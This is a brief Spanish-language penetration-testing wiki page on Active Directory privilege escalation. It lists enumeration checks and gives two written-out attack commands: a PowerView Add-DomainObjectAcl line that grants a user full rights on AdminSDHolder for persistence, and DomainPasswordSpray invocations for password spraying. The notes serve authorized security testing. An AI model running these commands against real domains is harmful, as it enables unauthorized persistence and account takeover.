> For the complete documentation index, see [llms.txt](https://wiki.securiters.com/securiters-wiki/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://wiki.securiters.com/securiters-wiki/internas/ad/persistence_acls.md).

# Local Privilege Escalation

Analizar:

* Los servicios que se encuentran instalados (cuáles son sus versiones), que se ejecutan en el equipo, que tiene el usuario del equipo...
* Historial de Powershell
* Pertenencia a grupos con privilegios --> conseguir shell como Local Admin

Probar:

* AdminSDHolder -<https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/adminsdholder>

{% code overflow="wrap" %}

```powershell
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=Security,DC=local' -PrincipalIdentity Moe -Rights All -verbose
```

{% endcode %}

* password spraying -<https://github.com/dafthack/DomainPasswordSpray/blob/master/DomainPasswordSpray.ps1>

```jsx
Invoke-DomainPasswordSpray -Password pass
Invoke-DomainPasswordSpray -PasswordList .\\Passwords.txt -Domain <Domain>
```
